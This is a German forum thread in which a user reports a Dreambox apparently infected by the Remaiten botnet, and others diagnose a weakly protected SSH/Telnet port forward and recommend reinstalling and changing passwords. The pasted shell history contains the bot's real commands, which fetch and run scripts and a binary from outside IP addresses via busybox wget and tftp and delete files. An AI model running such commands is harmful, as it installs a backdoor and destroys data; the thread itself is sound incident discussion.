Virus ??

  • Beim ftp aufs PC erhielt ich eine Viruswarnung :"linux remaiten virus" für "mscfg "und "retrieve files" ?



    Kürzlich geflasht aber die Box benimmt sich manchmal ungewohnt.


    nach "cat /home/root/.ash_history"
    kriege ich unter anderem folgende IPs ,die ich nicht kenne:

    cd /tmp :tired_face: cd /var/run :tired_face: cd /dev/shm :tired_face: cd /mnt :tired_face: cd /var;rm -f *;busybox wget http://107.182.24.29/rv.sh;sh rv.sh;busybox tftp -r rv1.sh -g 208.67.1.114;sh rv1.sh;busybox tftp 107.182.24.29 -c get rv2.sh;sh rv2.sh;exit


    busybox wget http://51.254.221.164/mig;cat mig > sh;./sh;rm -f *



    Soll ich mir Sorgen machen ?


    Habe alle Passwörter geændert.

  • ja, das passiert, wenn man seine Box ungeschützt mit ssh (oder sogar Telnet?) per Portforwarding ins Internet hängt... Und scheinbar hast Du dazu noch ein sträflich einfaches Passwort verwendet...

  • Du solltest nicht nur das Passwort auf der Box ändern. Auch auf allen anderen Geräten im Netzwerk und insbesondere im Router! Evtl. sogar alles neu aufsetzen.


    Das sieht nach einem Bot aus, der sich selbst weiterverteilt und da der dank der schlecht geschützten Dreambox in deinen Sicherheitsbereich, also dein privates Heimnetz, vorgedrungen ist! Und da ja offenbar sogar passgenaue Kommandos für das Linux der Dreambox (busybox) heruntergeladen wurden, kann der Bot machen, was er will.
    Eine der Dateien, die da wohl heruntergeladen wurden, habe ich mal scannen lassen: https://virustotal.com/de/file…94ec/analysis/1469032215/
    Ergebnis: Nicht alle Virenscanner schlagen an, aber die zuverlässigen (Avast, AVG, BitDefender, F-Secure, Kaspersky, Sophos, ...) stufen die Datei einheitlich als Backdoor ein. Also ein Service, der deine Box zur Marionette eines Unbekannten macht.


    Meiner Ansicht nach solltest du jedes Gerät mit LAN- oder WLAN-Schnittstelle als kompromittiert oder zumindest massiv gefährdet einstufen! Gründliche Virenscans (mit Boot-CD, z.B. desinfec't) von PCs und neu aufsetzen von embedded Geräten sind dringend angeraten.


    Und achja: Alle Portweiterleitungen im Router erstmal schließen. Aber das passiert beim neu aufsetzen ja eh :winking_face:

    so long
    m0rphU